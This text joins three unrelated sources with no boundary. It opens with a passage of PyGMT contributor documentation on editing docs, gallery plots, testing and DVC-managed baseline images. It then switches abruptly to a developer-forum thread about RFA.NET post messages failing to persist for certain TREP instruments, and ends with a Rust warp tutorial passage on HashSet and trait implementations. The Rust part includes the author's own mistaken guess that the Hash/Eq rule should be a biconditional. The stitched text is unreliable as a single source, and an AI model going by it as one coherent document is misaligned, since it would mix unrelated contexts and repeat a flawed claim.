When you’re done, scroll to the bottom of the page.
Fill out the two fields under “Commit changes”: the first is a short title describing your fixes; the second is a more detailed description of the changes. Try to be as detailed as possible and describe why you changed something.
Choose “Create a new branch for this commit and start a pull request” and click on the “Propose changes” button to open a pull request.
The pull request will run the GMT automated tests and make a preview deployment. You can see how your change looks in the PyGMT documentation by clicking the “View deployment” button after the Vercel bot has finished (usually 5-10 minutes after the pull request was created).
We’ll review your pull request, recommend changes if necessary, and then merge them in if everything is OK.
Done!
Alternatively, you can make the changes offline to the files in the
doc folder or the
example scripts. See editing the documentation locally
for instructions.
Editing the Documentation Locally
For more extensive changes, you can edit the documentation in your cloned repository and build the documentation to preview changes before submitting a pull request. First, follow the setting up your environment instructions. After making your changes, you can build the HTML files from sources using:
cd doc
make all
This will build the HTML files in
doc/_build/html.
Open
doc/_build/html/index.html in your browser to view the pages. Follow the
pull request workflow to submit your changes for review.
Adding example code
Many of the PyGMT functions have example code in their documentation. To contribute an
example, add an “Example” header and put the example code below it. Have all lines
begin with
>>>. To keep this example code from being run during testing, add the code
__doctest_skip__ = [function name] to the top of the module.
Inline code example
Below the import statements at the top of the file
__doctest_skip__ = ["module_name"]
At the end of the function’s docstring
Example
-------
>>> import pygmt
>>> # Comment describing what is happening
>>> Code example
Contributing Gallery Plots
The gallery and tutorials are managed by
sphinx-gallery.
The source files for the example gallery are
.py scripts in
examples/gallery/ that
generate one or more figures. They are executed automatically by sphinx-gallery when
the documentation is built. The output is gathered and
assembled into the gallery.
You can add a new plot by placing a new
.py file in one of the folders inside the
examples/gallery folder of the repository. See the other examples to get an idea for the
format.
General guidelines for making a good gallery plot:
Examples should highlight a single feature/command. Good: how to add a label to a colorbar. Bad: how to add a label to the colorbar and use two different CPTs and use subplots.
Try to make the example as simple as possible. Good: use only commands that are required to show the feature you want to highlight. Bad: use advanced/complex Python features to make the code smaller.
Use a sample dataset from pygmt.datasets if you need to plot data. If a suitable dataset isn’t available, open an issue requesting one and we’ll work together to add it.
Add comments to explain things that aren’t obvious from reading the code. Good: Use a Mercator projection and make the plot 15 centimeters wide. Bad: Draw coastlines and plot the data.
Describe the feature that you’re showcasing and link to other relevant parts of the documentation.
SI units should be used in the example code for gallery plots.
Contributing Tutorials
The tutorials (the User Guide in the docs) are also built by sphinx-gallery from the
.py files in the
examples/tutorials folder of the repository. To add a new tutorial:
Create a .py file in the examples/tutorials/advanced folder.
Write the tutorial in “notebook” style with code mixed with paragraphs explaining what is being done. See the other tutorials for the format.
Choose the most representative figure as the thumbnail figure by adding a comment line # sphinx_gallery_thumbnail_number = <fig_number> to any place (usually at the top) in the tutorial. The fig_number starts from 1.
Guidelines for a good tutorial:
Each tutorial should focus on a particular set of tasks that a user might want to accomplish: plotting grids, interpolation, configuring the frame, projections, etc.
The tutorial code should be as simple as possible. Avoid using advanced/complex Python features or abbreviations.
Explain the options and features in as much detail as possible. The gallery has concise examples while the tutorials are detailed and full of text.
SI units should be used in the example code for tutorial plots.
Note that the
Figure.show() function needs to be called for a plot to be inserted into
the documentation.
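A new tutorial file might start from a skeleton like the following — the file name, title, and region values are illustrative, and the PyGMT calls are left in comments so the sketch stays self-contained:

```python
# examples/tutorials/advanced/my_feature.py  (hypothetical file name)
r"""
My feature
==========

Notebook-style text explaining the first step goes here.
"""
# Use the second figure as the gallery thumbnail (illustrative).
# sphinx_gallery_thumbnail_number = 2

# %%
# Each ``# %%`` cell alternates code with explanatory text.
# Define the region of interest as [xmin, xmax, ymin, ymax].
region = [0, 10, 0, 10]

# %%
# The real tutorial would now build and show a figure, e.g.:
#
#   import pygmt
#   fig = pygmt.Figure()
#   fig.basemap(region=region, projection="X10c", frame=True)
#   fig.show()
```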
Editing the API Documentation
The API documentation is built from the docstrings in the Python
*.py files under
the
pygmt/src/ and
/pygmt/datasets/ folders. All docstrings should follow the
NumPy style guide.
All functions/classes/methods should have docstrings with a full description of all
arguments and return values.
While the maximum line length for code is automatically set by Black, docstrings must be formatted manually. To play nicely with Jupyter and IPython, keep docstrings limited to 79 characters per line.
Standards for Example Code
When editing documentation, use the following standards to demonstrate the example code:
Python arguments, such as import statements, Boolean expressions, and function arguments should be wrapped as code by using `` on both sides of the code. Examples: ``import pygmt`` results in import pygmt, ``True`` results in True, ``style="v"`` results in style="v".
Literal GMT arguments should be bold by wrapping the arguments with ** (two asterisks) on both sides. The argument description should be italicized with * (single asterisk) on both sides. Examples: **+l**\ *label* results in +llabel, **05m** results in 05m.
Optional arguments are wrapped with [ ] (square brackets).
Arguments that are mutually exclusive are separated with a | (bar) to denote “or”.
Default arguments for parameters and configuration settings are wrapped with [ ] (square brackets) with the prefix “Default is”. Example: [Default is p].
Cross-referencing with Sphinx
The API reference is manually assembled in
doc/api/index.rst.
The autodoc sphinx extension will automatically create pages for each
function/class/module/method listed there.
You can reference functions, classes, modules, and methods from anywhere (including docstrings) using:
:func:`package.module.function`
:class:`package.module.class`
:meth:`package.module.method`
:mod:`package.module`
An example would be to use
:meth:`pygmt.Figure.grdview` to link
to.
PyGMT documentation that is not a class, method,
or module can be linked with
:doc:`Any Link Text </path/to/the/file>`.
For example,
:doc:`Install instructions </install>` links
to.
Linking to the GMT documentation and GMT configuration parameters can be done using:
:gmt-docs:`page_name.html`
:gmt-term:`GMT_PARAMETER`
An example would be using
:gmt-docs:`makecpt.html` to link to.
For GMT configuration parameters, an example is
:gmt-term:`COLOR_FOREGROUND` to link to.
Sphinx will create a link to the automatically generated page for that function/class/module/method.
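For instance, a docstring passage might combine these roles as follows — the targets are the real pages mentioned above, while the surrounding sentence is illustrative:

```rst
Plots the grid with :meth:`pygmt.Figure.grdview`, using a CPT built as in
:gmt-docs:`makecpt.html` and honoring the :gmt-term:`COLOR_FOREGROUND`
setting. See also the :doc:`install instructions </install>`.
```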
Contributing Code
PyGMT Code Overview
The source code for PyGMT is located in the
pygmt/ directory. When contributing
code, be sure to follow the general guidelines in the
pull request workflow section.
Code Style
We use some tools to format the code so we don’t have to think about it:
Black and blackdoc loosely follow the PEP8 guide but with a few differences. Regardless, you won’t have to worry about formatting the code yourself. Before committing, run the following to automatically format your code:
make format
For consistency, we also use UNIX-style line endings (
\n) and file permission
644 (
-rw-r--r--) throughout the whole project.
Don’t worry if you forget to do it. Our continuous integration systems will
warn us and you can make a new commit with the formatted code.
Even better, you can just write
/format in the first line of any comment in a
Pull Request to lint the code automatically.
When wrapping a new alias, use an underscore to separate words bridged by vowels
(aeiou), such as
no_skip and
z_only. Do not use an underscore to separate
words bridged only by consonants, such as
distcalc, and
crossprofile. This
convention is not applied by the code checking tools, but the PyGMT maintainers
will comment on any pull requests as needed.
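As an illustration only (this helper is not part of PyGMT or its tooling), the vowel rule could be expressed like so:

```python
VOWELS = set("aeiou")


def alias_name(*words):
    """Join words per the PyGMT alias convention (illustrative sketch):
    insert an underscore only when the boundary between two words
    touches a vowel."""
    name = words[0]
    for word in words[1:]:
        # The bridge letters are the last letter of the left word and
        # the first letter of the right word.
        if name[-1] in VOWELS or word[0] in VOWELS:
            name += "_" + word
        else:
            name += word
    return name


# alias_name("no", "skip")       -> "no_skip"
# alias_name("z", "only")        -> "z_only"
# alias_name("dist", "calc")     -> "distcalc"
# alias_name("cross", "profile") -> "crossprofile"
```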
We also use flake8 and
pylint to check the quality of the code and quickly catch
common errors.
The
Makefile
contains rules for running both checks:
make check  # Runs black, blackdoc, docformatter, flake8 and isort (in check mode)
make lint   # Runs pylint, which is a bit slower
Testing your Code
Automated testing helps ensure that our code is as free of bugs as it can be. It also lets us know immediately if a change we make breaks any other part of the code.
All of our test code and data are stored in the
tests subpackage.
We use the pytest framework to run the test suite.
Please write tests for your code so that we can be sure that it won’t break any of the existing functionality. Tests also help us be confident that we won’t break your code in the future.
When writing tests, don’t test everything that the GMT function already tests, such as
every unique combination of arguments. An exception to this would be the most popular
methods, such as
plot and
basemap. The highest priority for tests should be the
Python-specific code, such as numpy, pandas, and xarray objects and the virtualfile
mechanism.
If you’re new to testing, see existing test files for examples of things to do. Don’t let the tests keep you from submitting your contribution! If you’re not sure how to do this or are having trouble, submit your pull request anyway. We will help you create the tests and sort out any kind of problem during code review.
Pull the baseline images, run the tests, and calculate test coverage using:
dvc status  # should report any files 'not_in_cache'
dvc pull    # pull down files from DVC remote cache (fetch + checkout)
make test
The coverage report will let you know which lines of code are touched by the tests.
If all the tests pass, you can view the coverage reports by opening
htmlcov/index.html
in your browser. Strive to get 100% coverage for the lines you changed.
It’s OK if you can’t or don’t know how to test something.
Leave a comment in the PR and we’ll help you out.
You can also run tests in just one test script using:
pytest pygmt/tests/NAME_OF_TEST_FILE.py
or run tests which contain names that match a specific keyword expression:
pytest -k KEYWORD pygmt/tests
Testing Plots
Writing an image-based test is only slightly more difficult than a simple test.
The main consideration is that you must specify the “baseline” or reference
image, and compare it with a “generated” or test image. This is handled using
the decorator functions
@pytest.mark.mpl_image_compare and
@check_figures_equal
whose usage is further described below.
Using mpl_image_compare
This is the preferred way to test plots whenever possible.
This method uses the pytest-mpl
plug-in to test plot generating code.
Every time the tests are run,
pytest-mpl compares the generated plots with known
correct ones stored in
pygmt/tests/baseline.
If your test created a
pygmt.Figure object, you can test it by adding a decorator and
returning the
pygmt.Figure object:
@pytest.mark.mpl_image_compare
def test_my_plotting_case():
    "Test that my plotting function works"
    fig = Figure()
    fig.basemap(region=[0, 360, -90, 90], projection='W7i', frame=True)
    return fig
Your test function must return the
pygmt.Figure object and you can only
test one figure per function.
Before you can run your test, you’ll need to generate a baseline (a correct version) of your plot. Run the following from the repository root:
pytest --mpl-generate-path=baseline pygmt/tests/NAME_OF_TEST_FILE.py
This will create a
baseline folder with all the plots generated in your test
file.
Visually inspect the one corresponding to your test function.
If it’s correct, copy it (and only it) to
pygmt/tests/baseline.
When you run
make test the next time, your test should be executed and
passing.
Don’t forget to commit the baseline image as well!
The images should be pushed up into a remote repository using
dvc (instead of
git) as will be explained in the next section.
Using Data Version Control (dvc) to Manage Test Images
As the baseline images are quite large blob files that can change often (e.g.
with new GMT versions), it is not ideal to store them in
git (which is meant
for tracking plain text files). Instead, we will use
dvc
which is like
git but for data. What
dvc does is to store the hash (md5sum)
of a file. For example, given an image file like
test_logo.png,
dvc will
generate a
test_logo.png.dvc plain text file containing the hash of the
image. This
test_logo.png.dvc file can be stored as usual on GitHub, while
the
test_logo.png file can be stored separately on our
dvc remote at.
To pull or sync files from the
dvc remote to your local repository, use
the commands below. Note how
dvc commands are very similar to
git.
dvc status  # should report any files 'not_in_cache'
dvc pull    # pull down files from DVC remote cache (fetch + checkout)
Once the sync/download is complete, you should notice two things. There will be
images stored in the
pygmt/tests/baseline folder (e.g.
test_logo.png) and
these images are technically reflinks/symlinks/copies of the files under the
.dvc/cache folder. You can now run the image comparison test suite as per
usual.
pytest pygmt/tests/test_logo.py # run only one test make test # run the entire test suite
To push or sync changes from your local repository up to the
dvc remote
at DAGsHub, you will first need to set up authentication using the commands
below. This only needs to be done once, i.e. the first time you contribute a
test image to the PyGMT project.
dvc remote modify upstream --local auth basic
dvc remote modify upstream --local user "$DAGSHUB_USER"
dvc remote modify upstream --local password "$DAGSHUB_PASS"
The configuration will be stored inside your
.dvc/config.local file. Note
that the $DAGSHUB_PASS token can be generated at
after creating a DAGsHub account (can be linked to your GitHub account). Once
you have an account set up, please ask one of the PyGMT maintainers to add you
as a collaborator at
before proceeding with the next steps.
The entire workflow for generating or modifying baseline test images can be summarized as follows:
# Sync with both git and dvc remotes
git pull
dvc pull

# Generate new baseline images
pytest --mpl-generate-path=baseline pygmt/tests/test_logo.py
mv baseline/*.png pygmt/tests/baseline/

# Generate hash for baseline image and stage the *.dvc file in git
dvc status  # check which files need to be added to dvc
dvc add pygmt/tests/baseline/test_logo.png
git add pygmt/tests/baseline/test_logo.png.dvc

# Commit changes and push to both the git and dvc remotes
git commit -m "Add test_logo.png into DVC"
dvc status --remote upstream  # Report which files will be pushed to the dvc remote
dvc push  # Run before git push to enable automated testing with the new images
git push
Using check_figures_equal
This approach draws the same figure using two different methods (the reference
method and the tested method), and checks that both of them are the same.
It takes two
pygmt.Figure objects (‘fig_ref’ and ‘fig_test’), generates a png
image, and checks for the Root Mean Square (RMS) error between the two.
Here’s an example:
@check_figures_equal()
def test_my_plotting_case():
    "Test that my plotting function works"
    fig_ref, fig_test = Figure(), Figure()
    fig_ref.grdimage("@earth_relief_01d_g", projection="W120/15c", cmap="geo")
    fig_test.grdimage(grid, projection="W120/15c", cmap="geo")
    return fig_ref, fig_test
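A rough sketch of the RMS comparison idea in plain Python — the real check rasterizes both figures to PNG and compares pixels, while the values here are made-up grayscale samples:

```python
import math


def rms_difference(pixels_ref, pixels_test):
    """Root Mean Square error between two equal-sized pixel sequences."""
    if len(pixels_ref) != len(pixels_test):
        raise ValueError("images must have the same size")
    squared = [(a - b) ** 2 for a, b in zip(pixels_ref, pixels_test)]
    return math.sqrt(sum(squared) / len(squared))


# Identical images give an RMS of 0; the decorator passes when the RMS
# stays below a small tolerance.
ref = [0, 128, 255, 64]
test_ok = [0, 128, 255, 64]
test_bad = [0, 120, 255, 64]
print(rms_difference(ref, test_ok))   # 0.0
print(rms_difference(ref, test_bad))  # 4.0
```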
Hi
I run the below program which publishes to a service SERVICE on TREP using the latest RFA.net api.
It publishes 2 instruments in /exactly/ the same way but for the instrument anderstest4 the published change does not stick, regardless of the order in which I publish the instruments (or whether I publish both or not).
Furthermore, both publications receive positive acknowledgment from TREP.
There is no issue doing exactly the same using the EMA api, going through the same endpoint.
Why does TREP discard the publications for certain instruments when they come from the RFA.net api but not from EMA?
SERVICE is an internal service with a persistent cache that we update with post messages.
static void Main(string[] args)
{
Random rng = new Random();
stalltest("anderstest4", rng.NextDouble().ToString());
stalltest("anderstest42", rng.NextDouble().ToString());
}
static void stalltest(string instrument, string testvalue)
{
Realtime.TREP.Request request = Realtime.TREP.Request.As(Environment.UserName, "UAT");
var sf = request.MarketAccessTo("SERVICE");
using (var form = sf.CreatePublishingFormStream())
{
form.FillOut(instrument, "QUERY", testvalue);
form.Submit();
System.Threading.Thread.Sleep(100);
}
using (var image = sf.CreateSnapshotSubscription(new[] { instrument }, new[] { "QUERY" }))
{
string test = image.TakeSnapshot()[instrument, "QUERY"].FieldValue;
if (test != testvalue)
{
Console.WriteLine(instrument + " stalled!");
}
else
{
Console.WriteLine(instrument + " works as expected.");
}
}
}
it prints out
anderstest4 stalled!
anderstest42 works as expected.
The PublishingFormStream posts PostMsg objects off-stream with a FieldList as payload.
The FieldList contains the FID for the QUERY field and a RMTES string encoding the random double as a string.
The anderstest4 instrument was created with exactly the same code and has worked fine for some time, until it suddenly got stuck. This happens daily for other instrument that we create and publish to. We currently can't use the RFA.net api for publishing our updates because of this.
We're using ADH version adh3.2.0.L1.linux.tis.rrg 64-bit.
Sincerely
Anders A. Søndergaard
Thanks for confirming that you are indeed populating the databuffer correctly - just needed to eliminate that possibility - as this is a common mistake we have seen being made by other developers.
Also thanks for sharing the 2nd trace file where you published 'umer' to the same fid for the two different instruments. I can see that on the outgoing post the identical data is being sent:
PostMsg anderstest42 <fieldEntry fieldId="32650" data="1B25 3075 6D65 72"/>
PostMsg anderstest4 <fieldEntry fieldId="32650" data="1B25 3075 6D65 72"/>
This confirms that the API and your application is working and encoding the outgoing payload correctly.
However, when you subscribe to the items we get back different values.
Refresh anderstest42 <fieldEntry fieldId="32650" data="1B25 3075 6D65 72"/>
Refresh anderstest4 <fieldEntry fieldId="32650" data="7465 7374 3437"/>
This indicates that the problem lies elsewhere i.e. the TREP infrastructure components.
As per my initial post, I recommend you speak to your Market Data team so they can check if there is anything reported in their TREP logs.
If they confirm that they do not see any issues reported, then I recommend they raise a support ticket with our TREP support team.
If your Market Data team passes on the Trace files you have generated, they will provide evidence that your application is behaving correctly and publishing the right data and that the problem lies somewhere in TREP.
One final thing you could try - just for elimination purpose is to remove the '1B 25 30' bytes from the RMTES String payload -
e.g. something like
dataBuffer.SetFromString(value, DataBuffer.DataBufferEnum.StringRMTES)
- and run the test again with ASCII only string value as per your above tests.
As you say, if it works once it should work a 2nd time, but I just want to eliminate the possibility that TREP is perhaps occasionally not coping well with this switching function.
I tried recreating your scenario here and published two RICs in sequence with identical payload including FID 32650 and I could not get it to fail (with or without the above 3 bytes).
The above code does not resemble RFA.NET code - I can only assume you are using some internal wrapper? Without sight of the actual underlying RFA.net code it would not be possible to confirm if there are any issues with said code.
There a couple of things to try:
If you have access to the RFA config files, you can enable the low level trace using the following parameters:
\Connections\<Connection_RSSL>\traceMsgToFile = True
\Connections\<Connection_RSSL>\traceMsgFileName = "<your trace file location and name>"
where <Connection_RSSL> should be replaced with the actual connection being used by whichever Session you acquire from the config.
Trace attached rfatrace_5984.txt
The point I want to get across is that the code is working in general, except for particular instruments. That means it's unlikely to be an issue with the code.
The code that calls the RFA looks like this
this.Msg.Clear();
this.Attrib.Clear();
Attrib.ServiceName = RFAserviceName; // i.e. new RFA_String("SERVICE")
Attrib.NameType = RDM.INSTRUMENT_NAME_TYPES.INSTRUMENT_NAME_RIC;
Attrib.Name = new RFA_String(instrument);
Msg.AttribInfo = Attrib;
Msg.MsgModelType = RDM.MESSAGE_MODEL_TYPES.MMT_MARKET_PRICE;
Msg.IndicationMask = PostMsg.IndicationMaskFlag.MessageInit | PostMsg.IndicationMaskFlag.MessageComplete;
Msg.IndicationMask |= PostMsg.IndicationMaskFlag.WantAck;
Msg.SeqNum = PostID; // don't need the fine granularity provided by seqnum. Just set it to postId.
Msg.PostID = PostID;
if ((Msg.HintMask & PostMsg.HintMaskFlag.Seq) == 0) throw new System.Exception("Flag not set");
pendingAcks.Add(PostID, new AckInfo { InstrumentName = instrument });
++PostID;
{
FieldList container = new FieldList();
container.Clear();
container.SetInfo(this.RDMdict.DictId, (short)Dictionary.DICTIONARY_TYPES.DICTIONARY_RECORD_TEMPLATES);
flItr.Start(container);
foreach (var field in instrumentForm.Fields)
{
msgEntry.Clear();
msgEntry.FieldID = field.Key;
msgEntry.Data = field.Value;
flItr.Bind(msgEntry);
}
flItr.Complete();
Msg.Payload = container;
}
OMMHandleItemCmd cmd = new OMMHandleItemCmd();
cmd.Handle = this.loginHandler.LoginStreamHandle; // Off-stream posting, using our loginHandlers stream (and its event handler for ack messages)
cmd.Msg = Msg;
consumer.Submit(cmd);
As mentioned, without your underlying code, it is difficult to investigate what is going wrong.
However, based on the trace I can see that data being sent to server for two instruments is different in length.
For anderstest42 your application is sending the following value:
<fieldEntry fieldId="32650" data="1B25 3030 2E39 3132 3632 3734 3138 3031 3931 37"/>
For anderstest4 your application is sending the following value:
<fieldEntry fieldId="32650" data="1B25 3030 2E35 3438 3830 3038 3235 3836 3235 3837"/>
When you then subscribe to those items, you are receiving back the following payload:
for anderstest42:
<fieldEntry fieldId="32650" data="1B25 3030 2E39 3132 3632 3734 3138 3031 3931 37"/>
and for anderstest4:
<fieldEntry fieldId="32650" data="7465 7374 3437"/>
Incidentally - the above hex data converts to 'test47' - does this mean anything to you?
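For reference, these traced payloads are easy to decode; a short Python sketch (the helper name here is illustrative, not part of any SDK). The longer payloads begin with the RMTES escape 1B 25 30 announcing UTF-8 content, as built in the encoder code later in this thread:

```python
def decode_field(hex_dump: str) -> str:
    """Decode a traced fieldEntry payload, stripping the RMTES 'ESC % 0' prefix if present."""
    raw = bytes.fromhex(hex_dump.replace(" ", ""))
    if raw.startswith(b"\x1b%0"):  # 1B 25 30: RMTES escape announcing UTF-8 content
        raw = raw[3:]
    return raw.decode("utf-8")

print(decode_field("7465 7374 3437"))                                   # test47
print(decode_field("1B25 3030 2E39 3132 3632 3734 3138 3031 3931 37"))  # 0.91262741801917
```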
What are you contributing the data to - what does service 'SERVICE' represent? Is it some contributions engine, which perhaps has some rules defined for what length/values it can accept for the fid 32650 and is therefore being rejected? You may well get an ACK from the ADS because it considers the post a valid post msg format, but it is then being discarded by the upstream server.
Also, I should point out that your current wrapper implementation is incredibly inefficient - just in that single trace file you are performing connect, login, source directory download, logout, disconnect four times - which is a considerable overhead given that you are only posting and subscribing two items.
As a test - please post the identical value to the field for both anderstest4 and anderstest42 and see what happens.
The "test47" string is the field value from before my test, set by another client using the EMA API.
I've already told you everything I know about SERVICE. It's an internal persistent cache that's only updated with Post message, configured in the ADH. No interactive providers are attached to it.
The wrapper code is deliberately inefficient during startup. It is, however, a lot more efficient than the raw RFA API in terms of developer time spent coding, and it does not sacrifice performance once a subscription is established.
New trace attached where I send the string "umer". rfatrace_332.txt
Thanks for sharing the code. I cannot see how instrumentForm.Fields and its constituent Value are populated, so cannot be sure if the FieldEntry.Data is being populated with the correct DataBuffer content.
Please see attached file for an example of how FieldEntry.Data is populated for different field types e.g. for a string type field (such as 32650):
field.FieldID = 296; // Ask MMID 1 - Alphanumeric/RMTEST_STRING field
RFA_String AskStr = new RFA_String("Ask MMID data");
dataBuffer.SetFromString(AskStr, DataBuffer.DataBufferEnum.StringRMTES);
field.Data = dataBuffer;
fieldListWIt.Bind(field);
The attached code is extracted from the Encoder.cs file which can be found in the Examples\Common\ folder of the RFA.NET SDK.
Logically, and as you can verify from the trace, instrumentForm.Fields and its constituent Value must be populated properly since it works for one instrument but not the other, having run exactly the same code with only the instrument name differing.
Anyway, here is the code if you want to prove me wrong:
public void FillOut(string instrument, string field, object value)
{
RDMFidDef def = GetFidDef(field);
Open(instrument).Fields[def.FieldId] = Encoder.Encode(def, value);
}
public Data Encode(RDMFidDef fidDef, object value)
{
byte type_indicator = RFATypes.OMMType2DataBufferEnum(fidDef);
return Encode(type_indicator, value);
}
switch (fidDef.OMMType)
{
case OMMTypeEnum.RWF_TYPE_XML:
return DataBuffer.DataBufferEnum.XML;
case OMMTypeEnum.RWF_TYPE_OPAQUE:
return DataBuffer.DataBufferEnum.Opaque;
case OMMTypeEnum.RWF_TYPE_RMTES_STRING:
return DataBuffer.DataBufferEnum.StringRMTES;
case OMMTypeEnum.RWF_TYPE_UTF8_STRING:
return DataBuffer.DataBufferEnum.StringUTF8;
case OMMTypeEnum.RWF_TYPE_ASCII_STRING:
return DataBuffer.DataBufferEnum.StringAscii;
case OMMTypeEnum.RWF_TYPE_DATE_TIME:
return DataBuffer.DataBufferEnum.DateTime;
case OMMTypeEnum.RWF_TYPE_TIME:
return DataBuffer.DataBufferEnum.Time;
case OMMTypeEnum.RWF_TYPE_DATE:
return DataBuffer.DataBufferEnum.Date;
case OMMTypeEnum.RWF_TYPE_REAL:
return DataBuffer.DataBufferEnum.Real;
case OMMTypeEnum.RWF_TYPE_DOUBLE:
return DataBuffer.DataBufferEnum.Double;
case OMMTypeEnum.RWF_TYPE_FLOAT:
return DataBuffer.DataBufferEnum.Float;
etc etc etc
private Data Encode(byte type_indicator, object value, ErrMsgr default_prepend) {
DataBuffer result = new DataBuffer();
if (value == null)
{
result.SetBlankData(type_indicator);
return result;
}
switch (type_indicator) {
case DataBufferEnum.StringRMTES: // A nice string type with a private encoding scheme and no public encoder for it.
byte[] utf8_part = Encoding.UTF8.GetBytes(dynamic_cast<string>(value, default_prepend)); // The RMTESConverter is one-way only.
byte[] rmtes = new byte[3 + utf8_part.LongLength]; // Tell the RMTES string that we contain utf8.
new byte[] { 0x1B, 0x25, 0x30 }.CopyTo(rmtes, 0); // see
utf8_part.CopyTo(rmtes, 3);
result.SetBuffer(new ThomsonReuters.RFA.Common.Buffer(rmtes), type_indicator);
break;
case DataBufferEnum.StringUTF8:
case DataBufferEnum.XML:
result.SetBuffer(new ThomsonReuters.RFA.Common.Buffer(Encoding.UTF8.GetBytes(dynamic_cast<string>(value, default_prepend))), type_indicator);
break;
case DataBufferEnum.StringAscii:
result.SetFromString(new RFA_String(dynamic_cast<string>(value, default_prepend)), type_indicator);
break;
case DataBufferEnum.Double:
result.SetDouble(dynamic_cast<double>(value, default_prepend),type_indicator);
break;
case DataBufferEnum.Real: // Radix 10 floating point number implementation (!?)
result.SetFromString(new RFA_String(dynamic_cast<double>(value, default_prepend).ToString()), type_indicator);
break;
etc etc etc
static T dynamic_cast<T>(object value, ErrMsgr prepend_err = null)
{
try
{
return (T)(dynamic)value;
}
catch ....
Anders
Hi Umer
Thanks for confirming that our implementation is correct.
Thanks also for the suggestion. I tried the SetFromString() method with the same result.
You of course also need the source code in case it turns out to be a bug in the RFA API.
The issue is tricky to reproduce. We use some instruments and suddenly they freeze and cannot be updated or deleted via the RFA API. Oddly, the EMA API works fine: it can change the stuck instruments, but that doesn't get them unstuck for RFA.NET.
The freezing typically happens after a few minutes of use (disconnecting, connecting, re-requesting, etc.). After an instrument gets stuck, we can't get it unstuck.
I'll revert back to our market data team.
Thanks for the update.
It is very odd what you are seeing - as the underlying Reuters Wire Format is used by both RFA and EMA - if you enable the low level trace in EMA you should see the same PostMsg being sent to the server as per your RFA code.
It would be interesting to see if there are any subtle differences at your end between the APIs in the trace messages...
Good idea. Unfortunately I don't have immediate access to the other implementation, but will forward your request.
Apart from the code being different, it was also run from another location (actually another country, but hitting the same TREP instance). We tried using the same credentials (username, appid, network position) from RFA, with the same result: stuck instrument.
Anders
https://community.developers.refinitiv.com/questions/54033/stuck-instruments-when-posting.html?sort=oldest
Welcome back! Last time we saw each other I wrote:
Next in line is the GET method, which means we'll see parameter handling and (finally) deal with this HashSet thing.
So, "let us not waste our time in idle discourse!"
Warp 3, make it so!
The code for this part is available here.
First, I needed another dependency to help me deserialize the GET return, so I changed the Cargo.toml file:
serde_json = "1.0"
Then, the time came to change try_list(). As of our last encounter, this test had only a request() and the assert_eq!. I added two things:
- Before the request, I manually inserted two entries into the HashSet (I could've called POST, but since it is already being tested elsewhere, it is ok to take this shortcut);
- After the request, I deserialized the HTTP body and compared its content to the data I had previously inserted.
There's a chance that a few things will appear weird, but don't worry, I will go through each one of them.
use std::collections::HashSet;

#[tokio::test]
async fn try_list() {
    use std::str;
    use serde_json;

    let simulation1 = models::Simulation {
        id: 1,
        name: String::from("The Big Goodbye"),
    };
    let simulation2 = models::Simulation {
        id: 2,
        name: String::from("Bride Of Chaotica!"),
    };

    let db = models::new_db();
    db.lock().await.insert(simulation1.clone());
    db.lock().await.insert(simulation2.clone());

    let api = filters::list_sims(db);

    // Fetch all entries.
    let response = request()
        .method("GET")
        .path("/holodeck")
        .reply(&api)
        .await;

    let result: Vec<u8> = response.into_body().into_iter().collect();
    let result = str::from_utf8(&result).unwrap();
    let result: HashSet<models::Simulation> = serde_json::from_str(result).unwrap();
    assert_eq!(models::get_simulation(&result, 1).unwrap(), &simulation1);
    assert_eq!(models::get_simulation(&result, 2).unwrap(), &simulation2);

    // Fetch a single entry by id.
    let response = request()
        .method("GET")
        .path("/holodeck/2")
        .reply(&api)
        .await;

    let result: Vec<u8> = response.into_body().into_iter().collect();
    let result = str::from_utf8(&result).unwrap();
    let result: HashSet<models::Simulation> = serde_json::from_str(result).unwrap();
    assert_eq!(result.len(), 1);
    assert_eq!(models::get_simulation(&result, 2).unwrap(), &simulation2);
}
The first thing I take as deserving an explanation is the db.lock().await.insert(). The lock() gives you what's inside the Arc, and in this case, it returns a Future. Why? Because we are not using std::sync::Mutex, but tokio::sync::Mutex, which is an async implementation of the former. That's why we don't unwrap(), but instead await, as we need to suspend execution until the result of the Future is ready.
Moving on, filters::list_sims() is now getting a parameter, which is the data it will return (which, in a real execution, would come from the HTTP body).
After the request—that remains the same—there are three lines of Bytes-handling-jibber-jabber.
Bytes is the format with which warp's RequestBuilder handles the HTTP body content. It looks like a [u8] (that is, an array of the primitive u8), but it is a little bit more painful to handle. What I did with it, however, is simple. I:
- Mapped its content to a Vector of u8
- Moved the Vector's content to the slice
- Used the serde_json::from_str() function to map it to the Simulation struct inside the HashSet.
And this is one of the reasons I wanted a HashSet. As far as I know, standard Rust doesn't allow you to create a HashMap referring to a struct of two fields; that is, you cannot do that:
// This code is not in the project!
struct Example {
    id: u64,
    name: String,
}

type Impossible = HashMap<Example>;
And without using a struct as I did with the HashSet (as well as the cool kids did with Vector here at line 205), using serde gets... complicated (which means I have no idea how to do it).
Nonetheless, there is another reason why I wanted to stick the struct within the HashSet: it gave me the chance to implement some traits for my type.
Before diving into the traits, I would like to explain the last part of the test (which should be a different test, but the example is already too big).
The GET method can be used in three different ways:
- Fetch all the entries: /holodeck
- Fetch a single entry: /holodeck/:id
- Fetch filtered entries: /holodeck/?search=query
This last request() using the path /holodeck/2 was written to cover the second case. I did not (and will not) develop the third one.
Boldly implementing traits
If you compare one HashSet element with another, it will compare everything. That's no good if you have a key-value-pair struct. As I didn't want to use HashMap because of the aforementioned reasons, the way to go is to change this behavior, making comparisons only care about the id.
First, I brought in Hash and Hasher; then I removed Eq, PartialEq and Hash from the derive list, so I could implement them myself. And the implementation was this:
use std::hash::{Hash, Hasher};

#[derive(Clone, Debug, Deserialize, Serialize)]
pub struct Simulation {
    pub id: u64,
    pub name: String,
}

impl PartialEq for Simulation {
    fn eq(&self, other: &Self) -> bool {
        self.id == other.id
    }
}

impl Eq for Simulation {}

impl Hash for Simulation {
    fn hash<H: Hasher>(&self, state: &mut H) {
        self.id.hash(state);
    }
}
How did I know how to do it? I just followed the documentation where it says "How can I implement Eq?". Yes, Rust docs are that good.
And what about Hash? Same thing. But it is interesting to note why I did it. HashSet requires the Hash trait, and the Hash trait demands this:
k1 == k2 -> hash(k1) == hash(k2)
That means that if the values you're comparing are equal, their hashes also have to be equal. This would no longer hold after implementing PartialEq and Eq alone, because the derived hash was still using both fields while the direct comparison only cared about id.
99% chance that I am wrong, but I think it should not be an implication (→) but a biconditional (↔), because the way it stands, if k1 == k2 is false and hash(k1) == hash(k2) is true, the implication's result is still true. But I am not a trained computer scientist and I am not sure this uses first-order logic notation. Let me know in the comments if you do.
